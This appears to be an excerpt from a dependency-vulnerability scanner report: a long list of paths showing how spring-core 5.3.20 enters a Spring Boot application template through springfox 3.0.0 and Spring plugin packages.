  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
